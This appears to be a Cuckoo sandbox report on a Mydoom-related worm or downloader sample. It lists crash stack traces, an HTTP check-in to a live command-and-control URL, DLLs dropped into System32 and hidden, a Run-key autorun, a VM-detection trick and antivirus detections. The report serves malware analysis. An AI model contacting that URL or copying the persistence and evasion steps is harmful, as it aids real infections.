__exception__ Jan. 25, 2025, 9:14 a.m.	stacktrace: RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77ba35b7 RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77ba34a2 GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x76e1537d smnss+0x6187 @ 0x406187 smnss+0x5fac @ 0x405fac smnss+0x2f1d @ 0x402f1d BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x76e633aa RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77ba9f72 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77ba9f45 exception.instruction_r: 8b 06 89 45 e4 33 47 50 8a c8 32 cc 89 45 e4 32 exception.symbol: RtlImageNtHeader+0x139 RtlDeleteCriticalSection-0x1358 ntdll+0x332cd exception.instruction: mov eax, dword ptr [esi] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 209613 exception.address: 0x77ba32cd registers.esp: 76544192 registers.edi: 7340032 registers.eax: 20993 registers.ebp: 76544232 registers.edx: 2047 registers.ebx: 3484392 registers.esi: 3652336 registers.ecx: 33	1
__exception__ Jan. 25, 2025, 9:14 a.m.	stacktrace: RtlImageNtHeader+0xac6 RtlDeleteCriticalSection-0x9cb ntdll+0x33c5a @ 0x77ba3c5a RtlImageNtHeader+0xb6a RtlDeleteCriticalSection-0x927 ntdll+0x33cfe @ 0x77ba3cfe DnsApiFree+0x4a DnsApiAlloc-0x2e dnsapi+0x3195 @ 0x74aa3195 DnsApiFree+0x22 DnsApiAlloc-0x56 dnsapi+0x316d @ 0x74aa316d WSPStartup-0x36b4 mswsock+0x53f7 @ 0x73af53f7 WSPStartup-0x3730 mswsock+0x537b @ 0x73af537b WSPStartup-0x386f mswsock+0x523c @ 0x73af523c WSALookupServiceBeginW+0x257 WSAEventSelect-0xade ws2_32+0x59b1 @ 0x76d959b1 WSALookupServiceBeginW+0x233 WSAEventSelect-0xb02 ws2_32+0x598d @ 0x76d9598d WSALookupServiceBeginW+0x1c2 WSAEventSelect-0xb73 ws2_32+0x591c @ 0x76d9591c WSALookupServiceBeginW+0x72 WSAEventSelect-0xcc3 ws2_32+0x57cc @ 0x76d957cc WSALookupServiceBeginA+0x74 WahCloseApcHelper-0x3b1 ws2_32+0xa6b6 @ 0x76d9a6b6 gethostname+0x1bd WSALookupServiceNextA-0x63 ws2_32+0xa218 @ 0x76d9a218 gethostbyname+0xe7 WSCInstallProviderAndChains-0x1039 ws2_32+0x1775a @ 0x76da775a New_ws2_32_gethostbyname@4+0xab New_ws2_32_getsockname@12-0x63 @ 0x7426c3e3 smnss+0x6326 @ 0x406326 smnss+0x600e @ 0x40600e smnss+0x2f1d @ 0x402f1d BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x76e633aa RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77ba9f72 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77ba9f45 exception.instruction_r: 8b 49 04 89 55 ec 8b 12 3b d1 0f 85 fa 25 03 00 exception.symbol: RtlCleanUpTEBLangLists+0x9a RtlGetLastWin32Error-0x3a3 ntdll+0x58118 exception.instruction: mov ecx, dword ptr [ecx + 4] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 360728 exception.address: 0x77bc8118 registers.esp: 76541648 registers.edi: 3484264 registers.eax: 3484400 registers.ebp: 76541684 registers.edx: 3484512 registers.ebx: 3473408 registers.esi: 3484392 registers.ecx: 0	1
__exception__ Jan. 25, 2025, 9:14 a.m.	stacktrace: RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77ba35b7 RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77ba34a2 GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x76e1537d smnss+0x6187 @ 0x406187 smnss+0x5fac @ 0x405fac smnss+0x2f1d @ 0x402f1d BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x76e633aa RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77ba9f72 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77ba9f45 exception.instruction_r: 8b 06 89 45 e4 33 47 50 8a c8 32 cc 89 45 e4 32 exception.symbol: RtlImageNtHeader+0x139 RtlDeleteCriticalSection-0x1358 ntdll+0x332cd exception.instruction: mov eax, dword ptr [esi] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 209613 exception.address: 0x77ba32cd registers.esp: 76544192 registers.edi: 7340032 registers.eax: 20993 registers.ebp: 76544232 registers.edx: 2047 registers.ebx: 3482072 registers.esi: 3650016 registers.ecx: 1	1
__exception__ Jan. 25, 2025, 9:14 a.m.	stacktrace: RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77ba35b7 RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77ba34a2 GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x76e1537d smnss+0x6187 @ 0x406187 smnss+0x5fac @ 0x405fac smnss+0x2f1d @ 0x402f1d BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x76e633aa RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77ba9f72 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77ba9f45 exception.instruction_r: 31 06 8a 46 01 32 06 32 46 02 38 46 03 0f 85 97 exception.symbol: RtlImageNtHeader+0x1224 RtlDeleteCriticalSection-0x26d ntdll+0x343b8 exception.instruction: xor dword ptr [esi], eax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 213944 exception.address: 0x77ba43b8 registers.esp: 78641344 registers.edi: 7340032 registers.eax: 1205673936 registers.ebp: 78641384 registers.edx: 2047 registers.ebx: 3481256 registers.esi: 3253248 registers.ecx: 96	1
__exception__ Jan. 25, 2025, 9:14 a.m.	stacktrace: RtlImageNtHeader+0xac6 RtlDeleteCriticalSection-0x9cb ntdll+0x33c5a @ 0x77ba3c5a RtlImageNtHeader+0xb6a RtlDeleteCriticalSection-0x927 ntdll+0x33cfe @ 0x77ba3cfe DnsApiFree+0x4a DnsApiAlloc-0x2e dnsapi+0x3195 @ 0x74aa3195 DnsApiFree+0x22 DnsApiAlloc-0x56 dnsapi+0x316d @ 0x74aa316d NdrCorrelationPass+0x2b4 NdrSimpleStructMarshall-0x125 rpcrt4+0x18a68 @ 0x75638a68 NdrSimpleStructBufferSize+0x418 NdrPointerUnmarshall-0x4d rpcrt4+0x190df @ 0x756390df NdrPointerUnmarshall+0x30 NdrConformantStructUnmarshall-0x333 rpcrt4+0x1915c @ 0x7563915c NdrSimpleStructBufferSize+0x418 NdrPointerUnmarshall-0x4d rpcrt4+0x190df @ 0x756390df NdrPointerUnmarshall+0x30 NdrConformantStructUnmarshall-0x333 rpcrt4+0x1915c @ 0x7563915c NdrClientInitialize+0x125 I_RpcFreeBuffer-0x13c rpcrt4+0x17116 @ 0x75637116 NdrClientCall2+0x155 RpcAsyncInitializeHandle-0xb4 rpcrt4+0xb015a @ 0x756d015a DnsValidateName_W+0xcde DnsFree-0x7d dnsapi+0x42ee @ 0x74aa42ee DnsValidateName_W+0xc0c DnsFree-0x14f dnsapi+0x421c @ 0x74aa421c DnsQueryExW+0xed Reg_GetValueEx-0x13a8 dnsapi+0x4528 @ 0x74aa4528 DnsQueryExW+0x96 Reg_GetValueEx-0x13ff dnsapi+0x44d1 @ 0x74aa44d1 DnsQueryExW+0x39 Reg_GetValueEx-0x145c dnsapi+0x4474 @ 0x74aa4474 WSPStartup-0x3bd8 mswsock+0x4ed3 @ 0x73af4ed3 WSPStartup-0x3d4c mswsock+0x4d5f @ 0x73af4d5f WSPStartup-0x3f68 mswsock+0x4b43 @ 0x73af4b43 FreeAddrInfoW+0x198 WSALookupServiceNextW-0x9 ws2_32+0x4cb3 @ 0x76d94cb3 FreeAddrInfoW+0x178 WSALookupServiceNextW-0x29 ws2_32+0x4c93 @ 0x76d94c93 WSALookupServiceNextW+0xff WSALookupServiceEnd-0x47e ws2_32+0x4dbb @ 0x76d94dbb WSALookupServiceNextW+0x6a WSALookupServiceEnd-0x513 ws2_32+0x4d26 @ 0x76d94d26 WSALookupServiceNextA+0x52 WSALookupServiceBeginA-0x375 ws2_32+0xa2cd @ 0x76d9a2cd gethostname+0x1d0 WSALookupServiceNextA-0x50 ws2_32+0xa22b @ 0x76d9a22b gethostbyname+0xe7 WSCInstallProviderAndChains-0x1039 ws2_32+0x1775a @ 0x76da775a New_ws2_32_gethostbyname@4+0xab New_ws2_32_getsockname@12-0x63 @ 0x7426c3e3 smnss+0x6326 @ 0x406326 smnss+0x600e @ 0x40600e smnss+0x2f1d @ 0x402f1d BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x76e633aa RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77ba9f72 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77ba9f45 exception.instruction_r: 8b 49 04 89 55 ec 8b 12 3b d1 0f 85 fa 25 03 00 exception.symbol: RtlCleanUpTEBLangLists+0x9a RtlGetLastWin32Error-0x3a3 ntdll+0x58118 exception.instruction: mov ecx, dword ptr [ecx + 4] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 360728 exception.address: 0x77bc8118 registers.esp: 78636504 registers.edi: 3481240 registers.eax: 3481264 registers.ebp: 78636540 registers.edx: 3484544 registers.ebx: 3473408 registers.esi: 3481256 registers.ecx: 0	1

Performs some HTTP requests (1 event)

request

GET http://epsaphpaaa.ws/imgs/krewa/nqxa.php?id=7a45xloh&s5=3159&lip=192.168.168.209&win=fWinS

Creates executable files on the filesystem (6 events)

file	C:\Windows\System32\zipfi.dll
file	C:\Windows\System32\shervans.dll
file	C:\Windows\System32\satornas.dll
file	C:\Windows\System32\ctfmen.exe
file	C:\Windows\System32\grcopy.dll
file	C:\Windows\System32\zipfiaq.dll

Creates hidden or system file (1 event)

Time & API	Arguments	Status	Return	Repeated
SetFileAttributesW Jan. 25, 2025, 9:13 a.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\Windows\system32\satornas.dll filepath: C:\Windows\System32\satornas.dll	1	1	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Jan. 25, 2025, 9:13 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Raised Suricata alerts (3 events)

suricata	ETPRO MALWARE Worm.Mydoom Checkin
suricata	ETPRO MALWARE User-Agent (explwer)
suricata	ThreatFox Loki Password Stealer (PWS) botnet C2 traffic (ip:port - confidence level: 75%)

Detects virtualization software with SCSI Disk Identifier trick(s) (2 events)

registry	HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0
registry	HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\1

Installs itself for autorun at Windows startup (2 events)

reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ctfmen				reg_value	C:\Windows\system32\ctfmen.exe
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ctfmen				reg_value	C:\Windows\system32\ctfmen.exe

File has been identified by 13 AntiVirus engine on IRMA as malicious (13 events)

G Data Antivirus (Windows)	Virus: Dropped:Generic.Mydoom.5713DF4B (Engine A)
Avast Core Security (Linux)	Win32:Mydoom-BJ [Wrm]
C4S ClamAV (Linux)	Win.Malware.Generickdz-9918324-0
F-Secure Antivirus (Linux)	Trojan.TR/Downloader.Gen [Aquarius]
Sophos Anti-Virus (Linux)	Mal/Behav-104
eScan Antivirus (Linux)	Dropped:Generic.Mydoom.5713DF4B(DB)
ESET Security (Windows)	a variant of Win32/Agent.NHB worm
McAfee CLI scanner (Linux)	Trojan-FRMT
DrWeb Antivirus (Linux)	Trojan.DownLoader8.56532
ClamAV (Linux)	Win.Malware.Generickdz-9918324-0
Bitdefender Antivirus (Linux)	Dropped:Generic.Mydoom.5713DF4B
Kaspersky Standard (Windows)	Trojan.Win32.Small.acli
Emsisoft Commandline Scanner (Windows)	Dropped:Generic.Mydoom.5713DF4B (B)

Screenshots

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action	VT	Location
No hosts contacted.

Browser recommendation

File 148a0a0924609c80_zipfi.dll

Summary Download Resubmit sample

Score

Autosubmit

Feedback

Information on Execution

Analyzer Log

Cuckoo Log

Signatures

Feedback

Summary
Download Resubmit sample